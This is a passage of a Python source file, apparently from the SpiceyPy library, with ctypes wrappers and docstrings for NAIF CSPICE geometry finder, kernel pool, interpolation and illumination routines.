    :param sigcode: Interrupt signal ID code.
    :type sigcode: int
    """
    libspice.gfinth_c(ctypes.c_int(sigcode))
@spiceErrorCheck
def gfocce(occtyp, front, fshape, fframe, back,
           bshape, bframe, abcorr, obsrvr, tol,
           udstep, udrefn, rpt, udrepi, udrepu,
           udrepf, bail, udbail, cnfine, result):
    """
    Determine time intervals when an observer sees one target
    occulted by another. Report progress and handle interrupts
    if so commanded.
    The surfaces of the target bodies may be represented by triaxial
    ellipsoids or by topographic data provided by DSK files.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfocce_c.html
    :param occtyp: Type of occultation
    :type occtyp: str
    :param front: Name of body occulting the other
    :type front: str
    :param fshape: Type of shape model used for front body
    :type fshape: str
    :param fframe: Body fixed body centered frame for front body
    :type fframe: str
    :param back: Name of body occulted by the other
    :type back: str
    :param bshape: Type of shape model used for back body
    :type bshape: str
    :param bframe: Body fixed body centered frame for back body
    :type bframe: str
    :param abcorr: Aberration correction flag
    :type abcorr: str
    :param obsrvr: Name of the observing body
    :type obsrvr: str
    :param tol: Convergence tolerance in seconds
    :type tol: float
    :param udstep: Name of the routine that returns a time step
    :type udstep: spiceypy.utils.callbacks.UDSTEP
    :param udrefn: Name of the routine that computes a refined time
    :type udrefn: spiceypy.utils.callbacks.UDREFN
    :param rpt: Progress report flag
    :type rpt: bool
    :param udrepi: Function that initializes progress reporting.
    :type udrepi: spiceypy.utils.callbacks.UDREP
    :param udrepu: Function that updates the progress report
    :type udrepu: spiceypy.utils.callbacks.UDREPU
    :param udrepf: Function that finalizes progress reporting
    :type udrepf: spiceypy.utils.callbacks.UDREPF
    :param bail: Logical indicating program interrupt monitoring
    :type bail: bool
    :param udbail: Name of a routine that signals a program interrupt
    :type udbail: spiceypy.utils.callbacks.UDBAIL
    :param cnfine: SPICE window to which the search is restricted
    :type cnfine: spiceypy.utils.support_types.SpiceCell
    :param result: SPICE window containing results.
    :type result: spiceypy.utils.support_types.SpiceCell
    """
    # Marshal Python arguments into their ctypes equivalents; the
    # callback arguments (udstep, udrefn, udrep*, udbail) are passed
    # through unchanged.
    occtyp = stypes.stringToCharP(occtyp)
    front = stypes.stringToCharP(front)
    fshape = stypes.stringToCharP(fshape)
    fframe = stypes.stringToCharP(fframe)
    back = stypes.stringToCharP(back)
    bshape = stypes.stringToCharP(bshape)
    bframe = stypes.stringToCharP(bframe)
    abcorr = stypes.stringToCharP(abcorr)
    obsrvr = stypes.stringToCharP(obsrvr)
    tol = ctypes.c_double(tol)
    # SpiceBooleans are plain ints on the C side.
    rpt = ctypes.c_int(rpt)
    bail = ctypes.c_int(bail)
    # NOTE(review): unlike gfoclt, cnfine/result are not type-checked
    # here; callers must supply double-precision SpiceCells.
    libspice.gfocce_c(occtyp, front, fshape, fframe, back,
                      bshape, bframe, abcorr, obsrvr, tol,
                      udstep, udrefn, rpt, udrepi, udrepu, udrepf,
                      bail, udbail, ctypes.byref(cnfine), ctypes.byref(result))
@spiceErrorCheck
def gfoclt(occtyp, front, fshape, fframe, back, bshape, bframe, abcorr, obsrvr,
           step, cnfine, result):
    """
    Find time intervals during which an observer sees one target
    occulted by, or in transit across, another.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfoclt_c.html
    :param occtyp: Type of occultation.
    :type occtyp: str
    :param front: Name of body occulting the other.
    :type front: str
    :param fshape: Type of shape model used for front body.
    :type fshape: str
    :param fframe: Body-fixed, body-centered frame for front body.
    :type fframe: str
    :param back: Name of body occulted by the other.
    :type back: str
    :param bshape: Type of shape model used for back body.
    :type bshape: str
    :param bframe: Body-fixed, body-centered frame for back body.
    :type bframe: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param obsrvr: Name of the observing body.
    :type obsrvr: str
    :param step: Step size in seconds for finding occultation events.
    :type step: float
    :param cnfine: SPICE window to which the search is restricted.
    :type cnfine: spiceypy.utils.support_types.SpiceCell
    :param result: SPICE window containing results.
    :type result: spiceypy.utils.support_types.SpiceCell
    """
    # Both windows must be double-precision SpiceCells.
    for cell in (cnfine, result):
        assert isinstance(cell, stypes.SpiceCell)
        assert cell.is_double()
    occtyp_p = stypes.stringToCharP(occtyp)
    front_p = stypes.stringToCharP(front)
    fshape_p = stypes.stringToCharP(fshape)
    fframe_p = stypes.stringToCharP(fframe)
    back_p = stypes.stringToCharP(back)
    bshape_p = stypes.stringToCharP(bshape)
    bframe_p = stypes.stringToCharP(bframe)
    abcorr_p = stypes.stringToCharP(abcorr)
    obsrvr_p = stypes.stringToCharP(obsrvr)
    step_c = ctypes.c_double(step)
    libspice.gfoclt_c(occtyp_p, front_p, fshape_p, fframe_p, back_p,
                      bshape_p, bframe_p, abcorr_p, obsrvr_p, step_c,
                      ctypes.byref(cnfine), ctypes.byref(result))
@spiceErrorCheck
def gfpa(target, illmin, abcorr, obsrvr, relate, refval, adjust, step, nintvals,
         cnfine, result):
    """
    Find the time intervals for which a specified constraint on the
    phase angle between an illumination source, a target, and observer
    body centers is satisfied.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfpa_c.html
    :param target: Name of the target body.
    :type target: str
    :param illmin: Name of the illuminating body.
    :type illmin: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param obsrvr: Name of the observing body.
    :type obsrvr: str
    :param relate: Relational operator.
    :type relate: str
    :param refval: Reference value.
    :type refval: float
    :param adjust: Adjustment value for absolute extrema searches.
    :type adjust: float
    :param step: Step size used for locating extrema and roots.
    :type step: float
    :param nintvals: Workspace window interval count.
    :type nintvals: int
    :param cnfine: SPICE window to which the search is restricted.
    :type cnfine: spiceypy.utils.support_types.SpiceCell
    :param result: SPICE window containing results.
    :type result: spiceypy.utils.support_types.SpiceCell
    """
    # Both windows must be double-precision SpiceCells.
    for cell in (cnfine, result):
        assert isinstance(cell, stypes.SpiceCell)
        assert cell.is_double()
    target_p = stypes.stringToCharP(target)
    illmin_p = stypes.stringToCharP(illmin)
    abcorr_p = stypes.stringToCharP(abcorr)
    obsrvr_p = stypes.stringToCharP(obsrvr)
    relate_p = stypes.stringToCharP(relate)
    refval_c = ctypes.c_double(refval)
    adjust_c = ctypes.c_double(adjust)
    step_c = ctypes.c_double(step)
    nintvals_c = ctypes.c_int(nintvals)
    libspice.gfpa_c(target_p, illmin_p, abcorr_p, obsrvr_p, relate_p,
                    refval_c, adjust_c, step_c, nintvals_c,
                    ctypes.byref(cnfine), ctypes.byref(result))
@spiceErrorCheck
def gfposc(target, inframe, abcorr, obsrvr, crdsys, coord, relate, refval,
           adjust, step, nintvals, cnfine, result):
    """
    Find the time intervals for which a coordinate of an
    observer-target position vector satisfies a numerical constraint.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfposc_c.html
    :param target: Name of the target body.
    :type target: str
    :param inframe: Name of the reference frame for coordinate calculations.
    :type inframe: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param obsrvr: Name of the observing body.
    :type obsrvr: str
    :param crdsys: Name of the coordinate system containing COORD
    :type crdsys: str
    :param coord: Name of the coordinate of interest
    :type coord: str
    :param relate: Relational operator.
    :type relate: str
    :param refval: Reference value.
    :type refval: float
    :param adjust: Adjustment value for absolute extrema searches.
    :type adjust: float
    :param step: Step size used for locating extrema and roots.
    :type step: float
    :param nintvals: Workspace window interval count.
    :type nintvals: int
    :param cnfine: SPICE window to which the search is restricted.
    :type cnfine: spiceypy.utils.support_types.SpiceCell
    :param result: SPICE window containing results.
    :type result: spiceypy.utils.support_types.SpiceCell
    """
    # Both windows must be double-precision SpiceCells.
    for cell in (cnfine, result):
        assert isinstance(cell, stypes.SpiceCell)
        assert cell.is_double()
    target_p = stypes.stringToCharP(target)
    inframe_p = stypes.stringToCharP(inframe)
    abcorr_p = stypes.stringToCharP(abcorr)
    obsrvr_p = stypes.stringToCharP(obsrvr)
    crdsys_p = stypes.stringToCharP(crdsys)
    coord_p = stypes.stringToCharP(coord)
    relate_p = stypes.stringToCharP(relate)
    refval_c = ctypes.c_double(refval)
    adjust_c = ctypes.c_double(adjust)
    step_c = ctypes.c_double(step)
    nintvals_c = ctypes.c_int(nintvals)
    libspice.gfposc_c(target_p, inframe_p, abcorr_p, obsrvr_p, crdsys_p,
                      coord_p, relate_p, refval_c, adjust_c, step_c,
                      nintvals_c, ctypes.byref(cnfine), ctypes.byref(result))
@spiceErrorCheck
def gfrefn(t1, t2, s1, s2):
    """
    For those times when we can't do better, use bisection to find
    the next time at which to test for a state change.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfrefn_c.html
    :param t1: One of two values bracketing a state change.
    :type t1: float
    :param t2: The other value that brackets a state change.
    :type t2: float
    :param s1: State at t1.
    :type s1: bool
    :param s2: State at t2.
    :type s2: bool
    :return: New value at which to check for transition.
    :rtype: float
    """
    t1_c = ctypes.c_double(t1)
    t2_c = ctypes.c_double(t2)
    s1_c = ctypes.c_int(s1)
    s2_c = ctypes.c_int(s2)
    refined = ctypes.c_double()
    libspice.gfrefn_c(t1_c, t2_c, s1_c, s2_c, ctypes.byref(refined))
    return refined.value
@spiceErrorCheck
def gfrepf():
    """
    Terminate a GF progress report.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfrepf_c.html
    """
    libspice.gfrepf_c()
@spiceErrorCheck
def gfrepi(window, begmss, endmss):
    """
    This entry point initializes a search progress report.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfrepi_c.html
    :param window: A window over which a job is to be performed.
    :type window: spiceypy.utils.support_types.SpiceCell
    :param begmss: Beginning of the text portion of the output message.
    :type begmss: str
    :param endmss: End of the text portion of the output message.
    :type endmss: str
    """
    begmss = stypes.stringToCharP(begmss)
    endmss = stypes.stringToCharP(endmss)
    # don't do anything if we were given a pointer to a SpiceCell, like if we were in a callback
    # (a callback already receives the C-side pointer, so no validation or
    # byref wrapping is needed in that case)
    if not isinstance(window, ctypes.POINTER(stypes.SpiceCell)):
        assert isinstance(window, stypes.SpiceCell)
        assert window.is_double()
        window = ctypes.byref(window)
    libspice.gfrepi_c(window, begmss, endmss)
@spiceErrorCheck
def gfrepu(ivbeg, ivend, time):
    """
    Inform the progress reporting system how far a search has advanced.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfrepu_c.html
    :param ivbeg: Start time of work interval.
    :type ivbeg: float
    :param ivend: End time of work interval.
    :type ivend: float
    :param time: Current time being examined in the search process.
    :type time: float
    """
    libspice.gfrepu_c(ctypes.c_double(ivbeg), ctypes.c_double(ivend),
                      ctypes.c_double(time))
@spiceErrorCheck
def gfrfov(inst, raydir, rframe, abcorr, obsrvr, step, cnfine, result):
    """
    Find time intervals during which a specified ray intersects the
    space bounded by the field-of-view (FOV) of a specified instrument.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfrfov_c.html
    :param inst: Name of the instrument.
    :type inst: str
    :param raydir: Ray's direction vector.
    :type raydir: 3-Element Array of Float.
    :param rframe: Reference frame of ray's direction vector.
    :type rframe: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param obsrvr: Name of the observing body.
    :type obsrvr: str
    :param step: Step size in seconds for finding FOV events.
    :type step: float
    :param cnfine: SPICE window to which the search is restricted.
    :type cnfine: spiceypy.utils.support_types.SpiceCell
    :param result: SPICE window containing results.
    :type result: spiceypy.utils.support_types.SpiceCell
    """
    # Both windows must be double-precision SpiceCells.
    for cell in (cnfine, result):
        assert isinstance(cell, stypes.SpiceCell)
        assert cell.is_double()
    inst_p = stypes.stringToCharP(inst)
    raydir_v = stypes.toDoubleVector(raydir)
    rframe_p = stypes.stringToCharP(rframe)
    abcorr_p = stypes.stringToCharP(abcorr)
    obsrvr_p = stypes.stringToCharP(obsrvr)
    step_c = ctypes.c_double(step)
    libspice.gfrfov_c(inst_p, raydir_v, rframe_p, abcorr_p, obsrvr_p, step_c,
                      ctypes.byref(cnfine), ctypes.byref(result))
@spiceErrorCheck
def gfrr(target, abcorr, obsrvr, relate, refval, adjust, step, nintvals, cnfine,
         result):
    """
    Determine the time intervals over which a given constraint on the
    observer-target range rate is satisfied.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfrr_c.html
    :param target: Name of the target body.
    :type target: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param obsrvr: Name of the observing body.
    :type obsrvr: str
    :param relate: Relational operator.
    :type relate: str
    :param refval: Reference value.
    :type refval: float
    :param adjust: Adjustment value for absolute extrema searches.
    :type adjust: float
    :param step: Step size used for locating extrema and roots.
    :type step: float
    :param nintvals: Workspace window interval count.
    :type nintvals: int
    :param cnfine: SPICE window to which the search is restricted.
    :type cnfine: spiceypy.utils.support_types.SpiceCell
    :param result: SPICE window containing results.
    :type result: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(cnfine, stypes.SpiceCell)
    assert cnfine.is_double()
    assert isinstance(result, stypes.SpiceCell)
    assert result.is_double()
    libspice.gfrr_c(stypes.stringToCharP(target),
                    stypes.stringToCharP(abcorr),
                    stypes.stringToCharP(obsrvr),
                    stypes.stringToCharP(relate),
                    ctypes.c_double(refval),
                    ctypes.c_double(adjust),
                    ctypes.c_double(step),
                    ctypes.c_int(nintvals),
                    ctypes.byref(cnfine),
                    ctypes.byref(result))
@spiceErrorCheck
def gfsep(targ1, shape1, inframe1, targ2, shape2, inframe2, abcorr, obsrvr,
          relate, refval, adjust, step, nintvals, cnfine, result):
    """
    Determine the time intervals during which the angular separation
    between the position vectors of two target bodies, as seen by an
    observer, satisfies a numerical relationship.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfsep_c.html
    :param targ1: Name of first body.
    :type targ1: str
    :param shape1: Name of shape model describing the first body.
    :type shape1: str
    :param inframe1: The body-fixed reference frame of the first body.
    :type inframe1: str
    :param targ2: Name of second body.
    :type targ2: str
    :param shape2: Name of the shape model describing the second body.
    :type shape2: str
    :param inframe2: The body-fixed reference frame of the second body
    :type inframe2: str
    :param abcorr: Aberration correction flag
    :type abcorr: str
    :param obsrvr: Name of the observing body.
    :type obsrvr: str
    :param relate: Relational operator.
    :type relate: str
    :param refval: Reference value.
    :type refval: float
    :param adjust: Absolute extremum adjustment value.
    :type adjust: float
    :param step: Step size in seconds for finding angular separation events.
    :type step: float
    :param nintvals: Workspace window interval count.
    :type nintvals: int
    :param cnfine: SPICE window to which the search is restricted.
    :type cnfine: spiceypy.utils.support_types.SpiceCell
    :param result: SPICE window containing results.
    :type result: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(cnfine, stypes.SpiceCell)
    assert cnfine.is_double()
    assert isinstance(result, stypes.SpiceCell)
    assert result.is_double()
    libspice.gfsep_c(stypes.stringToCharP(targ1),
                     stypes.stringToCharP(shape1),
                     stypes.stringToCharP(inframe1),
                     stypes.stringToCharP(targ2),
                     stypes.stringToCharP(shape2),
                     stypes.stringToCharP(inframe2),
                     stypes.stringToCharP(abcorr),
                     stypes.stringToCharP(obsrvr),
                     stypes.stringToCharP(relate),
                     ctypes.c_double(refval),
                     ctypes.c_double(adjust),
                     ctypes.c_double(step),
                     ctypes.c_int(nintvals),
                     ctypes.byref(cnfine),
                     ctypes.byref(result))
@spiceErrorCheck
def gfsntc(target, fixref, method, abcorr, obsrvr, dref, dvec, crdsys, coord,
           relate, refval, adjust, step, nintvals,
           cnfine, result):
    """
    Determine the time intervals during which a coordinate of a
    surface intercept position vector satisfies a numerical constraint.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfsntc_c.html
    :param target: Name of the target body.
    :type target: str
    :param fixref: Body fixed frame associated with the target.
    :type fixref: str
    :param method: Name of method type for surface intercept calculation.
    :type method: str
    :param abcorr: Aberration correction flag
    :type abcorr: str
    :param obsrvr: Name of the observing body.
    :type obsrvr: str
    :param dref: Reference frame of direction vector of dvec.
    :type dref: str
    :param dvec: Pointing direction vector from the observer.
    :type dvec: 3-Element Array of floats
    :param crdsys: Name of the coordinate system containing COORD.
    :type crdsys: str
    :param coord: Name of the coordinate of interest
    :type coord: str
    :param relate: Relational operator.
    :type relate: str
    :param refval: Reference value.
    :type refval: float
    :param adjust: Absolute extremum adjustment value.
    :type adjust: float
    :param step: Step size in seconds for finding angular separation events.
    :type step: float
    :param nintvals: Workspace window interval count.
    :type nintvals: int
    :param cnfine: SPICE window to which the search is restricted.
    :type cnfine: spiceypy.utils.support_types.SpiceCell
    :param result: SPICE window containing results.
    :type result: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(cnfine, stypes.SpiceCell)
    assert cnfine.is_double()
    assert isinstance(result, stypes.SpiceCell)
    assert result.is_double()
    libspice.gfsntc_c(stypes.stringToCharP(target),
                      stypes.stringToCharP(fixref),
                      stypes.stringToCharP(method),
                      stypes.stringToCharP(abcorr),
                      stypes.stringToCharP(obsrvr),
                      stypes.stringToCharP(dref),
                      stypes.toDoubleVector(dvec),
                      stypes.stringToCharP(crdsys),
                      stypes.stringToCharP(coord),
                      stypes.stringToCharP(relate),
                      ctypes.c_double(refval),
                      ctypes.c_double(adjust),
                      ctypes.c_double(step),
                      ctypes.c_int(nintvals),
                      ctypes.byref(cnfine),
                      ctypes.byref(result))
@spiceErrorCheck
def gfsstp(step):
    """
    Set the step size to be returned by :func:`gfstep`.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfsstp_c.html
    :param step: Time step to take.
    :type step: float
    """
    libspice.gfsstp_c(ctypes.c_double(step))
@spiceErrorCheck
def gfstep(time):
    """
    Return the time step set by the most recent call to :func:`gfsstp`.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfstep_c.html
    :param time: Ignored ET value.
    :type time: float
    :return: Time step to take.
    :rtype: float
    """
    # The ET argument is required by the CSPICE signature but unused.
    step = ctypes.c_double()
    libspice.gfstep_c(ctypes.c_double(time), ctypes.byref(step))
    return step.value
@spiceErrorCheck
def gfstol(value):
    """
    Override the default GF convergence tolerance used by the
    high-level GF routines (the default is 1.0e-6).
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfstol_c.html
    :param value: Double precision value returned or to store.
    :type value: float
    """
    libspice.gfstol_c(ctypes.c_double(value))
@spiceErrorCheck
def gfsubc(target, fixref, method, abcorr, obsrvr, crdsys, coord, relate,
           refval, adjust, step, nintvals, cnfine,
           result):
    """
    Determine the time intervals during which a coordinate of a
    subpoint position vector satisfies a numerical constraint.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfsubc_c.html
    :param target: Name of the target body.
    :type target: str
    :param fixref: Body fixed frame associated with the target.
    :type fixref: str
    :param method: Name of method type for subpoint calculation.
    :type method: str
    :param abcorr: Aberration correction flag
    :type abcorr: str
    :param obsrvr: Name of the observing body.
    :type obsrvr: str
    :param crdsys: Name of the coordinate system containing COORD.
    :type crdsys: str
    :param coord: Name of the coordinate of interest
    :type coord: str
    :param relate: Relational operator.
    :type relate: str
    :param refval: Reference value.
    :type refval: float
    :param adjust: Adjustment value for absolute extrema searches.
    :type adjust: float
    :param step: Step size used for locating extrema and roots.
    :type step: float
    :param nintvals: Workspace window interval count.
    :type nintvals: int
    :param cnfine: SPICE window to which the search is restricted.
    :type cnfine: spiceypy.utils.support_types.SpiceCell
    :param result: SPICE window containing results.
    :type result: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(cnfine, stypes.SpiceCell)
    assert cnfine.is_double()
    assert isinstance(result, stypes.SpiceCell)
    assert result.is_double()
    libspice.gfsubc_c(stypes.stringToCharP(target),
                      stypes.stringToCharP(fixref),
                      stypes.stringToCharP(method),
                      stypes.stringToCharP(abcorr),
                      stypes.stringToCharP(obsrvr),
                      stypes.stringToCharP(crdsys),
                      stypes.stringToCharP(coord),
                      stypes.stringToCharP(relate),
                      ctypes.c_double(refval),
                      ctypes.c_double(adjust),
                      ctypes.c_double(step),
                      ctypes.c_int(nintvals),
                      ctypes.byref(cnfine),
                      ctypes.byref(result))
@spiceErrorCheck
def gftfov(inst, target, tshape, tframe, abcorr, obsrvr, step, cnfine):
    """
    Determine the time intervals during which a specified ephemeris
    object crosses the space bounded by the field-of-view (FOV) of a
    specified instrument.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gftfov_c.html
    :param inst: Name of the instrument.
    :type inst: str
    :param target: Name of the target body.
    :type target: str
    :param tshape: Type of shape model used for target body.
    :type tshape: str
    :param tframe: Body-fixed, body-centered frame for target body.
    :type tframe: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param obsrvr: Name of the observing body.
    :type obsrvr: str
    :param step: Step size in seconds for finding FOV events.
    :type step: float
    :param cnfine: SPICE window to which the search is restricted.
    :type cnfine: spiceypy.utils.support_types.SpiceCell
    :return: SpiceCell containing set of time intervals, within the confinement period, when the target body is visible
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(cnfine, stypes.SpiceCell)
    assert cnfine.is_double()
    # Unlike most GF routines, the result window is allocated here
    # (fixed capacity of 20000 entries) rather than supplied by the caller.
    result = stypes.SPICEDOUBLE_CELL(20000)
    libspice.gftfov_c(stypes.stringToCharP(inst),
                      stypes.stringToCharP(target),
                      stypes.stringToCharP(tshape),
                      stypes.stringToCharP(tframe),
                      stypes.stringToCharP(abcorr),
                      stypes.stringToCharP(obsrvr),
                      ctypes.c_double(step),
                      ctypes.byref(cnfine),
                      ctypes.byref(result))
    return result
@spiceErrorCheck
def gfudb(udfuns, udfunb, step, cnfine, result):
    """
    Perform a GF search on a user defined boolean quantity.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfudb_c.html
    :param udfuns: Name of the routine that computes a scalar quantity of interest corresponding to an 'et'.
    :type udfuns: ctypes.CFunctionType
    :param udfunb: Name of the routine returning the boolean value corresponding to an 'et'.
    :type udfunb: ctypes.CFunctionType
    :param step: Step size used for locating extrema and roots.
    :type step: float
    :param cnfine: SPICE window to which the search is restricted.
    :type cnfine: spiceypy.utils.support_types.SpiceCell
    :param result: SPICE window containing results.
    :type result: spiceypy.utils.support_types.SpiceCell
    :return: result
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    step = ctypes.c_double(step)
    libspice.gfudb_c(udfuns, udfunb, step, ctypes.byref(cnfine), ctypes.byref(result))
    # Return the result window as the docstring promises and as the
    # sibling gfuds() does; previously this function returned None
    # despite documenting a return value.
    return result
@spiceErrorCheck
def gfuds(udfuns, udqdec, relate, refval, adjust, step, nintvls, cnfine, result):
    """
    Perform a GF search on a user defined scalar quantity.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfuds_c.html
    :param udfuns: Name of the routine that computes the scalar quantity of interest at some time.
    :type udfuns: ctypes.CFunctionType
    :param udqdec: Name of the routine that computes whether the scalar quantity is decreasing.
    :type udqdec: ctypes.CFunctionType
    :param relate: Operator that either looks for an extreme value (max, min, local, absolute) or compares the geometric quantity value and a number.
    :type relate: str
    :param refval: Value used as reference for scalar quantity condition.
    :type refval: float
    :param adjust: Allowed variation for absolute extremal geometric conditions.
    :type adjust: float
    :param step: Step size used for locating extrema and roots.
    :type step: float
    :param nintvls: Workspace window interval count.
    :type nintvls: int
    :param cnfine: SPICE window to which the search is restricted.
    :type cnfine: spiceypy.utils.support_types.SpiceCell
    :param result: SPICE window containing results.
    :type result: spiceypy.utils.support_types.SpiceCell
    :return: result
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    # The two callback arguments are passed straight through to CSPICE.
    libspice.gfuds_c(udfuns, udqdec,
                     stypes.stringToCharP(relate),
                     ctypes.c_double(refval),
                     ctypes.c_double(adjust),
                     ctypes.c_double(step),
                     ctypes.c_int(nintvls),
                     ctypes.byref(cnfine),
                     ctypes.byref(result))
    return result
@spiceErrorCheck
@spiceFoundExceptionThrower
def gipool(name, start, room):
    """
    Return the integer values of a kernel variable from the kernel pool.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gipool_c.html
    :param name: Name of the variable whose value is to be returned.
    :type name: str
    :param start: Which component to start retrieving for name.
    :type start: int
    :param room: The largest number of values to return.
    :type room: int
    :return: Values associated with name.
    :rtype: list of int
    """
    # Allocate the output buffer before "room" is converted to c_int.
    ivals = stypes.emptyIntVector(room)
    n = ctypes.c_int()
    found = ctypes.c_int()
    libspice.gipool_c(stypes.stringToCharP(name),
                      ctypes.c_int(start),
                      ctypes.c_int(room),
                      ctypes.byref(n), ivals,
                      ctypes.byref(found))
    # Only the first n entries of the buffer are meaningful.
    return stypes.cVectorToPython(ivals)[0:n.value], bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def gnpool(name, start, room, lenout=_default_len_out):
    """
    Return the names of kernel variables matching a specified template.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gnpool_c.html
    :param name: Template that names should match.
    :type name: str
    :param start: Index of first matching name to retrieve.
    :type start: int
    :param room: The largest number of values to return.
    :type room: int
    :param lenout: Length of strings in output array kvars.
    :type lenout: int
    :return: Kernel pool variables whose names match name.
    :rtype: list of str
    """
    # Allocate the output string array before room/lenout are converted.
    kvars = stypes.emptyCharArray(yLen=room, xLen=lenout)
    n = ctypes.c_int()
    found = ctypes.c_int()
    libspice.gnpool_c(stypes.stringToCharP(name),
                      ctypes.c_int(start),
                      ctypes.c_int(room),
                      ctypes.c_int(lenout),
                      ctypes.byref(n), kvars,
                      ctypes.byref(found))
    return stypes.cVectorToPython(kvars)[0:n.value], bool(found.value)
################################################################################
# H
@spiceErrorCheck
def halfpi():
    """
    Return half the value of pi (the ratio of a circle's circumference
    to its diameter).
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/halfpi_c.html
    :return: Half the value of pi.
    :rtype: float
    """
    # Delegate to CSPICE so the constant matches the toolkit exactly.
    return libspice.halfpi_c()
@spiceErrorCheck
def hrmint(xvals, yvals, x):
    """
    Evaluate a Hermite interpolating polynomial at a given abscissa value.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/hrmint_c.html
    :param xvals: Abscissa values.
    :type xvals: Array of floats
    :param yvals: Ordinate and derivative values.
    :type yvals: Array of floats
    :param x: Point at which to interpolate the polynomial.
    :type x: float
    :return: Interpolated function value at x and the Interpolated function's derivative at x
    :rtype: tuple
    """
    # CSPICE needs scratch space sized from the ordinate array.
    work = stypes.emptyDoubleVector(int(2 * len(yvals) + 1))
    f = ctypes.c_double(0)
    df = ctypes.c_double(0)
    libspice.hrmint_c(ctypes.c_int(len(xvals)),
                      stypes.toDoubleVector(xvals),
                      stypes.toDoubleVector(yvals),
                      ctypes.c_double(x),
                      work, f, df)
    return f.value, df.value
@spiceErrorCheck
def hx2dp(string):
    """
    Convert a string holding a double precision number written in
    base 16 scientific notation into the equivalent double precision
    number.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/hx2dp_c.html
    :param string: Hex form string to convert to double precision.
    :type string: str
    :return: Double precision value to be returned, Or Error Message.
    :rtype: float or str
    """
    lenout = ctypes.c_int(80)
    errmsg = stypes.stringToCharP(lenout)
    number = ctypes.c_double()
    error = ctypes.c_int()
    libspice.hx2dp_c(stypes.stringToCharP(string), lenout,
                     ctypes.byref(number), ctypes.byref(error),
                     errmsg)
    # On parse failure CSPICE sets the error flag and fills errmsg;
    # mirror that by returning the message instead of a number.
    if error.value:
        return stypes.toPythonString(errmsg)
    return number.value
################################################################################
# I
@spiceErrorCheck
def ident():
    """
    Return the 3x3 identity matrix.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ident_c.html
    :return: The 3x3 identity matrix.
    :rtype: 3x3-Element Array of floats
    """
    out = stypes.emptyDoubleMatrix()
    libspice.ident_c(out)
    return stypes.cMatrixToNumpy(out)
@spiceErrorCheck
def illum(target, et, abcorr, obsrvr, spoint):
    """
    Deprecated: superseded by the CSPICE routine ilumin; kept only for
    backward compatibility.
    Find the illumination angles at a specified surface point of a
    target body.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/illum_c.html
    :param target: Name of target body.
    :type target: str
    :param et: Epoch in ephemeris seconds past J2000.
    :type et: float
    :param abcorr: Desired aberration correction.
    :type abcorr: str
    :param obsrvr: Name of observing body.
    :type obsrvr: str
    :param spoint: Body-fixed coordinates of a target surface point.
    :type spoint: 3-Element Array of floats
    :return:
            Phase angle,
            Solar incidence angle,
            and Emission angle at the surface point.
    :rtype: tuple
    """
    phase = ctypes.c_double(0)
    solar = ctypes.c_double(0)
    emissn = ctypes.c_double(0)
    libspice.illum_c(stypes.stringToCharP(target),
                     ctypes.c_double(et),
                     stypes.stringToCharP(abcorr),
                     stypes.stringToCharP(obsrvr),
                     stypes.toDoubleVector(spoint),
                     ctypes.byref(phase),
                     ctypes.byref(solar),
                     ctypes.byref(emissn))
    return phase.value, solar.value, emissn.value
@spiceErrorCheck
def illumf(method, target, ilusrc, et, fixref, abcorr, obsrvr, spoint):
    """
    Compute the illumination angles---phase, incidence, and
    emission---at a specified point on a target body, along with
    logical flags indicating whether the surface point is visible from
    the observer's position and whether it is illuminated.
    The target body's surface is represented using topographic data
    provided by DSK files, or by a reference ellipsoid.
    The illumination source is a specified ephemeris object.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/illumf_c.html
    :param method: Computation method.
    :type method: str
    :param target: Name of target body.
    :type target: str
    :param ilusrc: Name of illumination source.
    :type ilusrc: str
    :param et: Epoch in ephemeris seconds past J2000.
    :type et: float
    :param fixref: Body-fixed, body-centered target body frame.
    :type fixref: str
    :param abcorr: Desired aberration correction.
    :type abcorr: str
